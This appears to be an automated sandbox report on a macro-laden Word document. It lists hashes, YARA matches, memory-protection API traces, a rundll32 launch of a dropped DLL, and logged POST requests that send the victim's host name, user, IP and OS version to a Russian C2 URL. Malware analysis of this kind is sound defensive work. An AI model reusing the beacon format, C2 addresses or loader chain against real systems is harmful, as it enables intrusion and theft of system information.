Summary | ZeroBOX

0803_6700186721.doc

VBA_macro MSOffice File GIF Format
Category: FILE
Machine: s1_win7_x6403_us
Started: Aug. 4, 2021, 10:44 a.m.
Completed: Aug. 4, 2021, 10:46 a.m.
Size 539.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Mr.Administrator, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 3 10:29:00 2021, Last Saved Time/Date: Tue Aug 3 10:29:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5 52e17e1d3122e3157cb40e9b57711bc6
SHA256 0ff10f0cb0122c42bd2589dca5725782f4742f0267a10924c33099f0267425ac
CRC32 10E78B97
ssdeep 12288:pV9iQsDr8NQhqNrdjqLCV8L/EnqO1BKI9vIOaCuQByhC1A5vU:pVXkr8NpNrAmqL/EnJ1BsrPzhN58
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Suricata Alerts

Flow: TCP 192.168.56.103:49166 -> 54.243.175.83:80
SID: 2021997
Signature: ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
suspicious_features POST method with no referer header
suspicious_request POST http://arviskeist.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://arviskeist.ru/8/forum.php
request POST http://arviskeist.ru/8/forum.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aaad000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a6be000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a17000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a1d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08e9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08ebb000
process_handle: 0xffffffff
1 0 0
domain api.ipify.org
file c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
file C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
file C:\Users\test22\AppData\Local\Temp\ter.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000049c
filepath: C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$03_6700186721.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000065c
filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$qq.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$qq.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\qq.doc.LNK
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 0
family: 2
1 0 0
parent_process winword.exe
martian_process rundll32 c:\users\test22\appdata\roaming\microsoft\templates\ier.dll,NXYSYMIUJMD
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
0 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: GUID=8962251904648732308&BUILD=0308_spnv5&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)
1 1 0
file C:\Users\test22\AppData\Local\Temp\ter.dll
dead_host 212.193.48.110:80
dead_host 45.129.237.96:80